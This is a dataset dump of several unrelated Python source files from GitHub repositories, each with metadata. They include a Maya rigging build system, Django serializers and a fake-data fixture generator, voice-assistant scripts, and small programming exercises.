'xrp':\n xrp_param = {\n \"slug\": \"ripple\",\n \"convert\": \"USD\"\n }\n return xrp_param\n elif type == 'ltc':\n ltc_param = {\n \"slug\": \"litecoin\",\n \"convert\": \"USD\"\n }\n return ltc_param\n elif type == 'xlm':\n xlm_param = {\n \"slug\": \"stellar\",\n \"convert\": \"USD\"\n }\n return xlm_param\n elif type == 'bnb':\n bnb_param = {\n \"slug\": \"binance-coin\",\n \"convert\": \"USD\"\n }\n return bnb_param\n elif type == 'doge':\n doge_param = {\n \"slug\": \"dogecoin\",\n \"convert\": \"USD\"\n }\n return doge_param\n elif type == 'usdt':\n usdt_param = {\n \"slug\": \"tether\",\n \"convert\": \"USD\"\n }\n return usdt_param\n\n\n","repo_name":"Jschofi95/PythonCrypto","sub_path":"CryptoData.py","file_name":"CryptoData.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33713838528","text":"import itertools\r\ndef fun_sum(data):\r\n num = 0\r\n for i in range(len(data)-1):\r\n num += abs(data[i]-data[i+1])\r\n return num\r\n\r\nn = int(input())\r\narr = list(map(int, input().split()))\r\np = list(itertools.permutations(arr, len(arr)))\r\nresult = 0\r\nfor i in p:\r\n temp = fun_sum(i)\r\n if temp>result:\r\n result = temp\r\n\r\nprint(result)","repo_name":"aeriheo/study","sub_path":"4월 1주차/BOJ_10819.py","file_name":"BOJ_10819.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32338874728","text":"from faker import Faker\nimport random as rd\nfrom datetime import datetime, timedelta\nfrom django.utils.crypto import get_random_string\nimport json\n\ndef random_date(start, end):\n \"\"\"\n This function will return a random datetime between two datetime\n objects.\n \"\"\"\n delta = end - start\n int_delta = (delta.days * 24 * 60 * 60) + delta.seconds\n random_second = rd.randrange(int_delta)\n return start + timedelta(seconds=random_second)\n\nfake = Faker('de_DE')\n\ntest_stations = [2, 3, 4, 5, 6]\nlabs = [7]\n\ncontact_person_current_id = 0\n\nRESULT_CHOICES = [\n (1, 'Positive'),\n (0, 'Negative'),\n# (-1, 'Pending'),\n]\n\nINTENSITY_CHOICES = [0, 1, 2]\n\ndef one_week_before():\n return datetime.now() - timedelta(days=7)\n\ndef three_weeks_hence():\n return datetime.now() + timedelta(days=21)\n\n\ndef generate_model(pk, model, data):\n return dict(pk=pk, model=model, fields=data)\n\n\ndef generate_access_token(pk):\n return generate_model(pk, \"citizens.AccessToken\", dict(token=get_random_string(64),\n citizen=pk,\n is_write=True,\n expired=str(three_weeks_hence())))\n\n\ndef generate_test(pk):\n return generate_model(pk, \"health.Test\", dict(citizen=pk,\n result=rd.choice(RESULT_CHOICES)[0],\n test_station=rd.choice(test_stations),\n laboratory=rd.choice(labs),\n created_at=str(datetime.now()),\n updated_at=str(datetime.now())))\n\n\n\"\"\"citizen = models.ForeignKey(Citizen, related_name=\"contact_persons\", on_delete=models.CASCADE)\n last_contact = models.DateTimeField(default=one_week_hence)\n\n first_name = models.CharField(max_length=30)\n last_name = models.CharField(max_length=30)\n\n email = models.EmailField()\n telephone = PhoneNumberField()\n\n intensity = models.IntegerField(choices=INTENSITY_CHOICES, default=LOW)\n\n description = models.TextField()\"\"\"\n\n\ndef generate_contact_person(pk):\n global contact_person_current_id\n contact_person_current_id += 1\n return generate_model(contact_person_current_id, \"citizens.ContactPerson\",\n dict(first_name=fake.first_name(),\n last_name=fake.last_name(),\n citizen=pk,\n email=fake.email(),\n telephone=\"+49176\" + str(rd.randint(10000000, 99999999)),\n intensity=rd.choice(INTENSITY_CHOICES),\n description=fake.text()[0:200],\n last_contact=str(random_date(one_week_before(), datetime.now()))\n ))\n\n\ndef generate_citizen(pk):\n return generate_model(pk, \"citizens.Citizen\", dict(first_name=fake.first_name(),\n last_name=fake.last_name(),\n email=fake.email(),\n date_of_birth=str(fake.date_of_birth()),\n address=fake.street_name() + \" \" + str(rd.randint(1, 100)),\n zip_code=rd.choice([38100, 38101, 38102, 38103, 38104, 38105]),\n telephone=\"+49176\" + str(rd.randint(10000000, 99999999)),\n city=\"Braunschweig\"\n ))\n\n\noutput = []\nfor i in range(200):\n output.append(generate_citizen(i))\n output.append(generate_access_token(i))\n output.append(generate_test(i))\n\n for j in range(rd.randint(3,15)):\n output.append(generate_contact_person(i))\n\nwith open(\"base_data.json\", \"w\") as f:\n json.dump(output, f)\n","repo_name":"dippel-perk/morbus-clade","sub_path":"generate_fake_citizens.py","file_name":"generate_fake_citizens.py","file_ext":"py","file_size_in_byte":4123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1939313743","text":"import speech_recognition as sr\nfrom datetime import datetime\nimport webbrowser\nimport time\nfrom gtts import gTTS\nfrom playsound import playsound\nimport random\nimport os\n\n\nr =sr.Recognizer()\n\ndef record(ask = False):\n with sr.Microphone()as source:\n if ask:\n speak(ask)\n audio = r.listen(source)\n voice =''\n try:\n voice = r.recognize_google(audio,language ='tr-TR')\n except sr.UnknownValueError:\n speak('anlayamadım')\n return voice\n\n \ndef cevap(voice):\n if 'pazartesi hangi dersler var' in voice:\n speak(\"matematik \")\n if 'video aç' in voice:\n searchb = record('ne aramak istiyorsunuz ?')\n urlb = 'https://www.youtube.com/results?search_query='+ searchb\n webbrowser.get().open(urlb)\n speak(searchb + 'için bulduklarım')\n \n if 'nasılsın'in voice:\n speak(\"iyi senden\")\n \n if 'saat kaç' in voice:\n speak(datetime.now().strftime('%H:%M:%S'))\n if 'arama yap' in voice:\n search = record('ne aramak istiyorsunuz ?')\n url = 'https://www.google.com/search?q='+ search\n webbrowser.get().open(url)\n speak(search + 'için bulduklarım')\n if 'uygulamadan çık' in voice:\n speak(\"görüşürüz\")\n exit()\n \ndef speak(string):\n tts = gTTS(string,lang ='tr')\n rand =random.randint(1,100000)\n file = 'audio-'+str(rand)+'.mp3'\n tts.save(file)\n playsound(file)\n os.remove(file)\n \n\n \n \n \n \n \nspeak(\"nasıl yardımcı olabilirim\")\ntime.sleep(1)\nwhile 1:\n voice =record()\n print(voice)\n cevap(voice)\n \n","repo_name":"NaciGokhanBasaran/Sesli-asistan","sub_path":"sesliasistan.py","file_name":"sesliasistan.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"tr","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"74094809129","text":"import math\n\n\nclass Tile:\n def __init__(self, row, col):\n self.row = row\n self.col = col\n self.f = math.inf\n self.g = math.inf\n self.neighbors = []\n self.parent = None\n self.state = \"empty\"\n\n def __lt__(self, other):\n return self.f < getattr(other, \"f\", other)\n","repo_name":"xorz57/Pathfinder","sub_path":"pathfinder/entities/tile.py","file_name":"tile.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70010417447","text":"# -*- coding: utf-8 -*-\n\n# build-in\nimport importlib\nimport itertools\n\n# maya\nfrom pymel import core as pm\n\n# mbox\nfrom mbox import logger\nfrom .utils import traversal, import_component_module, add_jnt\n\n# mgear\nfrom mgear.core import attribute, transform, icon, primitive, node, applyop\n\n\nclass Context(list):\n\n @property\n def assembly(self):\n return self._assembly\n\n @assembly.setter\n def assembly(self, assembly):\n self._assembly = assembly\n\n def __init__(self):\n super(Context, self).__init__()\n self._assembly = None\n\n def instance(self, oid):\n instance = list(filter(lambda ins: ins.component[\"oid\"] == oid, self))\n return instance[0] if instance else None\n\n\nclass Instance:\n\n @property\n def component(self):\n return self._component\n\n @property\n def context(self):\n return self._context\n\n @property\n def root(self):\n return self._root\n\n @property\n def ctls(self):\n return self._ctls\n\n @property\n def refs(self):\n return self._refs\n\n @property\n def jnts(self):\n # jnts[0] = [parent, ref, uniform scale,\n return self._jnts\n\n @property\n def ui_host(self):\n if self.component[\"ui_host\"]:\n _, index, oid = self.component[\"ui_host\"].split(\",\")\n ui_host = self.context.instance(oid).ctls[int(index)]\n else:\n ui_host = self.context.assembly.ctls[0]\n div_attr_name = f\"{self.component['comp_name']}_{self.component['comp_side']}{self.component['comp_index']}\"\n if not pm.attributeQuery(div_attr_name, node=ui_host, exists=True):\n attribute.addEnumAttribute(ui_host, div_attr_name, 0, [\" \"])\n attribute.setNotKeyableAttributes(ui_host, [div_attr_name])\n return ui_host\n\n @property\n def comp_parent_ref(self):\n parent_component = self.component.parent\n parent_instance = None\n while parent_component:\n parent_instance = self.context.instance(parent_component[\"oid\"])\n if parent_instance.refs:\n break\n parent_component = parent_component.parent\n if parent_instance:\n if self.component[\"ref_parent_index\"] > -1:\n if int(self.component[\"ref_parent_index\"]) < len(parent_instance.refs):\n return parent_instance.refs[int(self.component[\"ref_parent_index\"])]\n if int(self.component[\"guide_parent_index\"]) < len(parent_instance.comp_ref_parent_dict):\n return parent_instance.comp_ref_parent_dict[int(self.component[\"guide_parent_index\"])]\n return parent_instance.refs[-1]\n\n @property\n def comp_parent_jnt(self):\n parent_instance = None\n component = self.component\n while component.parent:\n parent_instance = self.context.instance(component.parent[\"oid\"])\n if parent_instance.jnts:\n break\n component = component.parent\n if parent_instance.jnts:\n if self.component[\"jnt_parent_index\"] > -1:\n if int(self.component[\"jnt_parent_index\"]) < len(parent_instance.jnts):\n return parent_instance.jnts[int(self.component[\"jnt_parent_index\"])]\n if self.component[\"ref_parent_index\"] > -1:\n if int(self.component[\"ref_parent_index\"]) < len(parent_instance.jnts):\n return parent_instance.jnts[int(self.component[\"ref_parent_index\"])]\n if int(self.component[\"guide_parent_index\"]) < len(parent_instance.comp_jnt_parent_dict):\n return parent_instance.comp_jnt_parent_dict[int(self.component[\"guide_parent_index\"])]\n return parent_instance.jnts[-1][2]\n return None\n\n def __init__(self, context, component=None):\n self._root = None\n self._ctls = list()\n self._refs = list()\n self._jnts = list()\n self._component = component\n self._context = context\n self._context.append(self)\n if self.component.is_assembly:\n self._context.assembly = self\n self.comp_ref_parent_dict = dict()\n self.comp_jnt_parent_dict = dict()\n\n def add_root(self, m=pm.datatypes.Matrix()):\n naming = self.component.assembly.naming\n parent = self.comp_parent_ref\n name = naming.name(self.component, False, extension=\"root\") if self.component.parent else self.component[\"name\"]\n root = primitive.addTransform(parent, name, m)\n attribute.addAttribute(root, \"is_rig\", \"bool\", keyable=False)\n attribute.setKeyableAttributes(root, [])\n pm.connectAttr(root.attr(\"message\"), self.component.network.attr(\"rig\"), force=True)\n self._root = root\n return root\n\n def add_loc(self, parent, description, m):\n naming = self.component.assembly.naming\n loc = primitive.addTransform(parent,\n naming.name(\n self.component,\n False,\n description=description,\n extension=\"loc\"),\n m=m)\n attribute.setKeyableAttributes(loc, [])\n return loc\n\n def add_ctl(self, parent, parent_ctl, color, ctl_attr, npo_attr, description, cns, m, **kwargs):\n naming = self.component.assembly.naming\n ctl_attr = ctl_attr if ctl_attr else [\"tx\", \"ty\", \"tz\", \"rx\", \"ry\", \"rz\", \"ro\", \"sx\", \"sy\", \"sz\"]\n npo_attr = npo_attr if npo_attr else [\"v\"]\n if cns:\n parent = primitive.addTransform(parent,\n f\"{kwargs['name']}_cns\" if \"name\" in kwargs else naming.name(\n self.component,\n False,\n description=description,\n extension=\"cns\"),\n m=m)\n npo = primitive.addTransform(parent,\n f\"{kwargs['name']}_npo\" if \"name\" in kwargs else naming.name(\n self.component,\n False,\n description=description,\n extension=\"npo\"),\n m=m)\n attribute.setKeyableAttributes(npo, npo_attr)\n ctl = icon.create(npo,\n f\"{kwargs['name']}_{self.component['ctl_name_ext']}\" if \"name\" in kwargs else naming.name(\n self.component,\n False,\n description=description),\n color=color,\n icon=kwargs[\"icon\"] if \"icon\" in kwargs else \"cube\",\n w=kwargs[\"w\"],\n h=kwargs[\"h\"],\n d=kwargs[\"d\"],\n m=m)\n attribute.addAttribute(ctl, \"is_ctl\", \"bool\", keyable=False)\n attribute.addAttribute(ctl, \"ui_host\", \"message\")\n attribute.setKeyableAttributes(ctl, ctl_attr)\n pm.connectAttr(ctl.attr(\"message\"), self.component.network.attr(\"ctls\")[len(self.ctls)], force=True)\n tag = node.add_controller_tag(ctl, parent_ctl)\n tag.attr(\"visibilityMode\").set(1)\n self._ctls.append(ctl)\n return ctl\n\n def add_ref(self, parent, description, m):\n naming = self.component.assembly.naming\n ref = primitive.addTransform(parent,\n naming.name(self.component, False, description=description, extension=\"ref\"),\n m)\n self._refs.append(ref)\n return ref\n\n def add_jnt(self, parent, ref, name, uni_scale):\n parent = parent if parent else self.comp_parent_jnt\n if not parent:\n parent = \"deform\"\n rot_off = self.component[\"jnt_rot_off\"] if \"jnt_rot_off\" in self.component else [0, 0, 0]\n self._jnts.append([parent, ref, name, uni_scale, rot_off])\n return name\n\n def get_ctl_color(self, ik_fk='ik'):\n color = None\n if not self.component.is_assembly:\n if self.component[\"override_color\"]:\n if self.component[\"use_RGB_color\"]:\n if ik_fk == \"ik\":\n color = self.component[\"RGB_ik\"]\n else:\n color = self.component[\"RGB_fk\"]\n else:\n if ik_fk == \"ik\":\n color = self.component[\"color_ik\"]\n else:\n color = self.component[\"RGB_fk\"]\n else:\n if self.component.assembly[\"use_RGB_color\"]:\n if self.component[\"comp_side\"] == \"L\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"l_RGB_ik\"]\n else:\n color = self.component.assembly[\"l_RGB_fk\"]\n elif self.component[\"comp_side\"] == \"R\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"r_RGB_ik\"]\n else:\n color = self.component.assembly[\"r_RGB_fk\"]\n elif self.component[\"comp_side\"] == \"C\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"c_RGB_ik\"]\n else:\n color = self.component.assembly[\"c_RGB_fk\"]\n else:\n if self.component[\"comp_side\"] == \"L\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"l_color_ik\"]\n else:\n color = self.component.assembly[\"l_color_fk\"]\n elif self.component[\"comp_side\"] == \"R\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"r_color_ik\"]\n else:\n color = self.component.assembly[\"r_color_fk\"]\n elif self.component[\"comp_side\"] == \"C\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"c_color_ik\"]\n else:\n color = self.component.assembly[\"c_color_fk\"]\n else:\n if self.component.assembly[\"use_RGB_color\"]:\n if self.component[\"comp_side\"] == \"L\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"l_RGB_ik\"]\n else:\n color = self.component.assembly[\"l_RGB_fk\"]\n elif self.component[\"comp_side\"] == \"R\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"r_RGB_ik\"]\n else:\n color = self.component.assembly[\"r_RGB_fk\"]\n elif self.component[\"comp_side\"] == \"C\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"c_RGB_ik\"]\n else:\n color = self.component.assembly[\"c_RGB_fk\"]\n else:\n if self.component[\"comp_side\"] == \"L\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"l_color_ik\"]\n else:\n color = self.component.assembly[\"l_color_fk\"]\n elif self.component[\"comp_side\"] == \"R\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"r_color_ik\"]\n else:\n color = self.component.assembly[\"r_color_fk\"]\n elif self.component[\"comp_side\"] == \"C\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"c_color_ik\"]\n else:\n color = self.component.assembly[\"c_color_fk\"]\n return color\n\n\nclass BuildSystem:\n\n @property\n def blueprint(self):\n return self._blueprint\n\n @property\n def context(self):\n return self._context\n\n @property\n def order(self):\n # TODO: buildsystem custom step\n self._context = Context()\n msgs = list()\n procedure = list()\n # if self.blueprint[\"precess\"] == 2:\n # return\n objects_msg = list()\n attributes_msg = list()\n operators_msg = list()\n connectors_msg = list()\n objects = list()\n attributes = list()\n operators = list()\n connectors = list()\n result = list()\n traversal(self.blueprint,\n lambda x: self.__load(x),\n lambda x: x[\"children\"],\n result)\n for comp, obj, attr, operator, connector in result:\n objects_msg.append(f\"objects {comp['comp_name']} {comp['comp_side']} {comp['comp_index']}\")\n attributes_msg.append(f\"attributes {comp['comp_name']} {comp['comp_side']} {comp['comp_index']}\")\n operators_msg.append(f\"operators {comp['comp_name']} {comp['comp_side']} {comp['comp_index']}\")\n connectors_msg.append(f\"connector {comp['comp_name']} {comp['comp_side']} {comp['comp_index']}\")\n objects.append(obj)\n attributes.append(attr)\n operators.append(operator)\n connectors.append(connector)\n msgs += objects_msg\n procedure += objects\n # if self.blueprint[\"precess\"] == 2:\n # return\n msgs += attributes_msg\n procedure += attributes\n # if self.blueprint[\"precess\"] == 2:\n # return\n msgs += operators_msg\n procedure += operators\n # if self.blueprint[\"precess\"] == 2:\n # return\n msgs += connectors_msg\n procedure += connectors\n # if self.blueprint[\"precess\"] == 2:\n # return\n\n msgs.append(\"network tree\")\n procedure.append(self.network_tree)\n msgs.append(\"ctl structure\")\n procedure.append(self.ctl_structure)\n msgs.append(\"jnt structure\")\n procedure.append(self.jnt_structure)\n msgs.append(\"script node\")\n procedure.append(self.script_node)\n return list(zip(msgs, procedure))\n\n def __init__(self, blueprint):\n self._blueprint = blueprint\n self._context = None\n\n def __load(self, component):\n mod = import_component_module(component[\"comp_type\"], False)\n comp = mod.Rig(self.context, component)\n return component, comp.objects, comp.attributes, comp.operators, comp.connector\n\n def build(self):\n logger.info(\"mbox build system\")\n order = self.order\n total = len(order)\n count = 0\n logger.info(f\"total process... \")\n # logger.info(f\"inspect jnt... \")\n # if self.blueprint.naming.inspect_jnt_names():\n # return\n for msg, process in order:\n logger.info(f\"{msg}... [{count} / {total}]\")\n process()\n count += 1\n\n logger.info(\"build success\")\n\n def network_tree(self):\n traversal(self.blueprint,\n lambda x: [pm.connectAttr(x.network.attr(\"affects\")[0],\n child.network.attr(\"affectedBy\")[0], force=True)\n for child in x[\"children\"]],\n lambda x: x[\"children\"],\n list())\n\n def ctl_structure(self):\n character_set = self.context.assembly.root.attr(\"character_sets\").inputs()[0]\n ctls_set = [x for x in character_set.members() if \"control\" in x.name()][0]\n for instance in self.context:\n for ctl in instance.ctls:\n for shp in ctl.getShapes():\n connect_info = pm.listConnections(shp, connections=True, plugs=True)\n for source, destination in connect_info:\n pass\n # print(source, destination)\n # pm.connectAttr(destination.replace(shape.name(), new_shape.name()), source)\n shp.attr(\"isHistoricallyInteresting\").set(0)\n pm.sets(ctls_set, addElement=instance.ctls)\n\n # add dag pose\n # default T, model, Sim\n\n def jnt_structure(self):\n connect_jnt = self.blueprint[\"connect_jnt\"]\n root = self.context.assembly.root\n character_set = root.attr(\"character_sets\").inputs()[0]\n jnts_set = [x for x in character_set.members() if \"deform\" in x.name()][0]\n for instance in self.context:\n comp = instance.component\n for index, jnt in enumerate(instance.jnts):\n parent, ref, name, uni_scale, rot_off = jnt\n j = add_jnt(parent, ref, name, uni_scale, rot_off=rot_off, connect_jnt=connect_jnt, dag_tree=root)\n side = \"C\" if comp[\"comp_side\"] == \"C\" else \"S\"\n label = f\"{comp['comp_name']}_{side}{comp['comp_index']}_{index}\"\n side_set = [\"C\", \"L\", \"R\"]\n j.attr(\"side\").set(side_set.index(comp[\"comp_side\"]))\n j.attr(\"type\").set(\"Other\")\n j.attr(\"otherType\").set(label)\n j.attr(\"radius\").set(0.5)\n pm.connectAttr(j.attr(\"message\"), comp.network.attr(\"jnts\")[index], force=True)\n pm.sets(jnts_set, addElement=j)\n\n def script_node(self):\n # TODO: buildsystem script node\n trash_node = list()\n self.blueprint.network.attr(\"script_node\").outputs()\n blueprint = context.blueprint\n if blueprint.network.attr(\"script_node\").outputs():\n root_script_node = blueprint.network.attr(\"script_node\").outputs()[0]\n block_script_node = root_script_node.attr(\"script_node\").outputs()\n pm.delete([root_script_node] + block_script_node)\n\n script_nodes = list()\n\n def _get_script_node(_block):\n nonlocal script_nodes\n _ins = context.instance(_block.ins_name)\n if _ins.get(\"script_node\"):\n script_nodes += _ins.get(\"script_node\")\n for __b in _block[\"blocks\"]:\n _get_script_node(__b)\n\n _get_script_node(blueprint)\n\n if not script_nodes:\n return\n root_script_node = pm.createNode(\"script\", name=\"mbox_sc\")\n root_script_node.attr(\"sourceType\").set(1)\n root_script_node.attr(\"scriptType\").set(1)\n attribute.addAttribute(root_script_node, \"script_node\", \"message\")\n for node in script_nodes:\n pm.connectAttr(root_script_node.attr(\"script_node\"), node.attr(\"script_node\"))\n pm.connectAttr(blueprint.network.attr(\"script_node\"), root_script_node.attr(\"script_node\"))\n before_script_code = f\"\"\"import pymel.core as pm\nimport maya.api.OpenMaya as om2\nimport traceback\nimport logging\n\nlogger = logging.getLogger()\n\ndef destroy_cb(*args): # all callback clear\n global mbox_destroy_new_id\n global mbox_destroy_open_id\n global mbox_destroy_remove_ref_id\n global mbox_destroy_unload_ref_id\n global mbox_character_cb_registry\n global mbox_character_namespace_registry\n logger.info(\"destroy_cb\")\n\n try:\n for array in mbox_character_cb_registry:\n om2.MNodeMessage.removeCallback(array[1])\n om2.MSceneMessage.removeCallback(mbox_destroy_new_id)\n om2.MSceneMessage.removeCallback(mbox_destroy_open_id)\n om2.MSceneMessage.removeCallback(mbox_destroy_remove_ref_id)\n om2.MSceneMessage.removeCallback(mbox_destroy_unload_ref_id)\n del mbox_character_cb_registry\n del mbox_character_namespace_registry\n del mbox_destroy_new_id\n del mbox_destroy_open_id\n del mbox_destroy_remove_ref_id\n del mbox_destroy_unload_ref_id\n except:\n logger.error(\"destroy_cb\")\n traceback.print_exc()\n\n\ndef refresh_registry(*argc): # refresh registry at reference unload, remove\n global mbox_character_cb_registry\n global mbox_character_namespace_registry\n\n remove_list = list()\n for ns in mbox_character_namespace_registry:\n if not pm.namespaceInfo(ns, listNamespace=True):\n remove_list.append(ns)\n for rm in remove_list:\n mbox_character_namespace_registry.remove(rm)\n\n for array in mbox_character_cb_registry:\n if array[0].fullPathName == \"\":\n om2.MNodeMessage.removeCallback(array[1])\n mbox_character_cb_registry = [x for x in mbox_character_cb_registry if x[0].fullPathName() != \"\"]\n\n\ndef run_script_node():\n global mbox_destroy_id\n global mbox_character_cb_registry\n global mbox_character_namespace_registry\n\n try:\n mbox_character_namespace_registry\n except:\n mbox_character_namespace_registry = list()\n\n oid = '{blueprint[\"oid\"]}'\n all_network = [network for network in pm.ls(type=\"network\") if network.hasAttr(\"oid\")]\n networks = [network for network in all_network if network.attr(\"oid\").get() == oid]\n namespaces = pm.namespaceInfo(listOnlyNamespaces=True, recurse=True)\n if \"\" in mbox_character_namespace_registry:\n mbox_character_namespace_registry.remove(\"\")\n if not networks:\n return\n for network in networks:\n this_node = network.attr(\"script_node\").outputs(type=\"script\")\n namespace = network.namespace()\n if namespace:\n namespace = namespace[:-1]\n if this_node and namespace not in mbox_character_namespace_registry:\n block_scripts = this_node[0].attr(\"script_node\").outputs(type=\"script\")\n for sn in block_scripts:\n pm.scriptNode(sn, executeBefore=True)\n mbox_character_namespace_registry.append(namespace)\n\nrun_script_node()\n\ntry:\n om2.MSceneMessage.removeCallback(mbox_destroy_new_id)\nexcept:\n pass\nfinally:\n mbox_destroy_new_id = om2.MSceneMessage.addCallback(om2.MSceneMessage.kAfterNew, destroy_cb)\ntry:\n om2.MSceneMessage.removeCallback(mbox_destroy_open_id)\nexcept:\n pass\nfinally:\n mbox_destroy_open_id = om2.MSceneMessage.addCallback(om2.MSceneMessage.kAfterOpen, destroy_cb)\ntry:\n om2.MSceneMessage.removeCallback(mbox_destroy_remove_ref_id)\nexcept:\n pass\nfinally:\n mbox_destroy_remove_ref_id = om2.MSceneMessage.addCallback(om2.MSceneMessage.kAfterRemoveReference, refresh_registry)\ntry:\n om2.MSceneMessage.removeCallback(mbox_destroy_unload_ref_id)\nexcept:\n pass\nfinally:\n mbox_destroy_unload_ref_id = om2.MSceneMessage.addCallback(om2.MSceneMessage.kAfterUnloadReference, refresh_registry)\"\"\"\n pm.scriptNode(root_script_node, edit=True, beforeScript=before_script_code)\n pm.scriptNode(root_script_node, executeBefore=True)\n","repo_name":"chowooseung/mbox","sub_path":"scripts/mbox/box/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":22978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72240282728","text":"from django.db import transaction\nfrom rest_framework import serializers\nfrom rest_framework.generics import get_object_or_404\n\nfrom shop.models import Product\nfrom shop.serializers import ProductSerializer\nfrom warehouse.models.warehouse import (\n WarehouseItem, WarehouseItemComponent, WarehouseComponent\n)\nfrom warehouse.serializers.storage import StorageUnitComponentSerializer\n\n\nclass WarehouseComponentSerializer(serializers.ModelSerializer):\n storage_units = StorageUnitComponentSerializer(many=True, read_only=True)\n\n class Meta:\n model = WarehouseComponent\n fields = ['id', 'storage_units', 'name']\n\n\nclass WarehouseItemComponentSerializer(serializers.ModelSerializer):\n component = WarehouseComponentSerializer(read_only=True)\n component_id = serializers.IntegerField(write_only=True,\n source='component.id')\n\n class Meta:\n model = WarehouseItemComponent\n fields = ['id', 'component', 'quantity', 'component_id']\n\n\nclass WarehouseItemSerializer(serializers.ModelSerializer):\n warehouse_components = WarehouseItemComponentSerializer(\n many=True, read_only=True\n )\n product = ProductSerializer(read_only=True)\n warehouse_components_list = WarehouseItemComponentSerializer(\n many=True, write_only=True\n )\n product_id = serializers.IntegerField(write_only=True)\n\n class Meta:\n model = WarehouseItem\n fields = [\n 'id', 'product', 'warehouse_components',\n 'warehouse_components_list', 'product_id',\n ]\n\n def to_internal_value(self, data):\n if 'warehouse_components_list' in data:\n component_ids = [\n component['component_id']\n for component in data['warehouse_components_list']\n ]\n data['warehouse_components'] = WarehouseItemComponentSerializer(\n WarehouseComponent.objects.filter(id__in=component_ids),\n many=True\n )\n if 'product_id' in data:\n data['product'] = ProductSerializer(\n get_object_or_404(Product.objects.all(), pk=data['product_id'])\n )\n\n return super().to_internal_value(data)\n\n @staticmethod\n def update_or_create_components(components, instance):\n if components:\n current_components = []\n for warehouse_component in components:\n component_id = warehouse_component['component']['id']\n WarehouseItemComponent.objects.update_or_create(\n item=instance,\n component_id=component_id,\n defaults={\n 'quantity': warehouse_component['quantity'],\n }\n )\n current_components.append(component_id)\n\n instance.warehouse_components.exclude(\n component_id__in=current_components\n ).delete()\n\n @transaction.atomic\n def create(self, validated_data):\n warehouse_components = validated_data.pop(\n 'warehouse_components_list'\n )\n product = validated_data.pop('product_id')\n if product is not None:\n validated_data['product'] = Product.objects.get(id=product)\n\n instance = super().create(validated_data)\n\n self.update_or_create_components(warehouse_components, instance)\n\n return instance\n\n @transaction.atomic\n def update(self, instance, validated_data):\n warehouse_components = validated_data.pop(\n 'warehouse_components_list', None\n )\n product = validated_data.pop('product_id', None)\n if product is not None:\n validated_data['product'] = Product.objects.get(id=product)\n\n instance = super().update(instance, validated_data)\n\n self.update_or_create_components(warehouse_components, instance)\n\n return instance\n","repo_name":"godesteem/rental","sub_path":"warehouse/serializers/warehouse.py","file_name":"warehouse.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31515898747","text":"from collections import deque\r\n\r\nfirework_effects = deque([int(x) for x in input().split(', ')])\r\nexplosives = [int(x) for x in input().split(', ')]\r\nperfect_show = False\r\n\r\nfireworks = {\r\n 'Palm': 0,\r\n 'Willow': 0,\r\n 'Crossette': 0\r\n}\r\n\r\nwhile firework_effects and explosives:\r\n firework = firework_effects.popleft()\r\n explosive = explosives.pop()\r\n\r\n if explosive <= 0:\r\n firework_effects.appendleft(firework)\r\n continue\r\n\r\n if firework <= 0:\r\n explosives.append(explosive)\r\n continue\r\n\r\n\r\n total_power = firework + explosive\r\n\r\n if total_power % 3 == 0 and total_power % 5 != 0:\r\n fireworks['Palm'] += 1\r\n elif total_power % 5 == 0 and total_power % 3 != 0:\r\n fireworks['Willow'] += 1\r\n elif total_power % 3 == 0 and total_power % 5 == 0:\r\n fireworks['Crossette'] += 1\r\n else:\r\n firework_effects.append(firework - 1)\r\n explosives.append(explosive)\r\n\r\n if fireworks['Palm'] >= 3 and fireworks['Willow'] >= 3 and fireworks['Crossette'] >= 3:\r\n perfect_show = True\r\n break\r\n\r\nif perfect_show:\r\n print(\"Congrats! You made the perfect firework show!\")\r\nelse:\r\n print(\"Sorry. You can't make the perfect firework show.\")\r\nif firework_effects:\r\n print(f'Firework Effects left: {\", \".join([str(x) for x in firework_effects])}')\r\nif explosives:\r\n print(f'Explosive Power left: {\", \".join([str(x) for x in explosives])}')\r\n\r\nfor key in fireworks:\r\n print(f'{key} Fireworks: {fireworks[key]}')","repo_name":"MihailPo91/SoftUni","sub_path":"Advanced/exam_prep/fireworks_show.py","file_name":"fireworks_show.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5536384427","text":"import pyttsx3 #pip install pyttsx3\r\nimport speech_recognition as sr #pip install speechRecognition\r\nimport datetime\r\nimport wikipedia #pip install wikipedia\r\nimport webbrowser\r\nimport os\r\nimport smtplib\r\n\r\nengine = pyttsx3.init('sapi5')\r\nvoices = engine.getProperty('voices')\r\n# print(voices[1].id)\r\nengine.setProperty('voice', voices[1].id)\r\n\r\n\r\ndef speak(audio):\r\n engine.say(audio)\r\n engine.runAndWait()\r\n\r\n\r\ndef wishMe():\r\n hour = int(datetime.datetime.now().hour)\r\n if hour>=0 and hour<12:\r\n speak(\"Good Morning Sir!\")\r\n\r\n elif hour>=12 and hour<18:\r\n speak(\"Good Afternoon Sir!\")\r\n\r\n else:\r\n speak(\"Good Evening Sir!\")\r\n\r\n speak(\"I am Friday. 